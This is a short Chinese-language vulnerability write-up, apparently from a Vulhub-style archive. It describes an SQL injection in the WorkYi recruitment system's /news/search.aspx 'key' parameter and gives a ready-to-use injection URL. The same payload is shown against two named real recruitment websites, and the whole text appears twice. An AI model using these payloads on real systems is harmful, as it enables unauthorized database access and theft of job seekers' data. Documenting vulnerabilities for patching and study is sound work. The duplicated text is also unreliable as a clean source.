VULHUB ™

### 0x01 框架介绍 工作易人才招聘系统是由华兴科技网络开发的一套高端人才系统，并通过了国家计算机版权认证中心的认可。由.NET+ MSSQL编写，网站模板采用DIV+CSS构成，兼容IE6/IE7/IE8、火狐等主流内核浏览器，当然也兼容IE内核的傲游、世界之窗、腾讯TT等浏览器。 该网站主要由企业招聘、万能采集、手机版、木马检测、一句求贤、最新求职、人才评测、视频简历、院校联盟、个人服务、企业服务、资讯中心几大部分组成。工作易人才招聘系统是面向中小企业和个人站长建站时，最具性价比的一套人才招聘系统。以《实用、稳定、低价》的特色占据市场的一席之地。采用微软的.Net最新技术开发。 官方主页：www.workyi.com  ### 0x02 漏洞细节 漏洞处： /news/search.aspx?key= 利用方式： http://site/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='% 案例1： http://www.hellojob.com.cn/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%  案例2： http://www.nanlingjob.com/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2015-0115094

### 0x01 框架介绍 工作易人才招聘系统是由华兴科技网络开发的一套高端人才系统，并通过了国家计算机版权认证中心的认可。由.NET+ MSSQL编写，网站模板采用DIV+CSS构成，兼容IE6/IE7/IE8、火狐等主流内核浏览器，当然也兼容IE内核的傲游、世界之窗、腾讯TT等浏览器。 该网站主要由企业招聘、万能采集、手机版、木马检测、一句求贤、最新求职、人才评测、视频简历、院校联盟、个人服务、企业服务、资讯中心几大部分组成。工作易人才招聘系统是面向中小企业和个人站长建站时，最具性价比的一套人才招聘系统。以《实用、稳定、低价》的特色占据市场的一席之地。采用微软的.Net最新技术开发。 官方主页：www.workyi.com  ### 0x02 漏洞细节 漏洞处： /news/search.aspx?key= 利用方式： http://site/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='% 案例1： http://www.hellojob.com.cn/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%  案例2： http://www.nanlingjob.com/news/search.aspx?key='%20and%20@@version=0%20or%20'%'='%  ### 0x03 参考链接 http://www.wooyun.org/bugs/wooyun-2015-0115094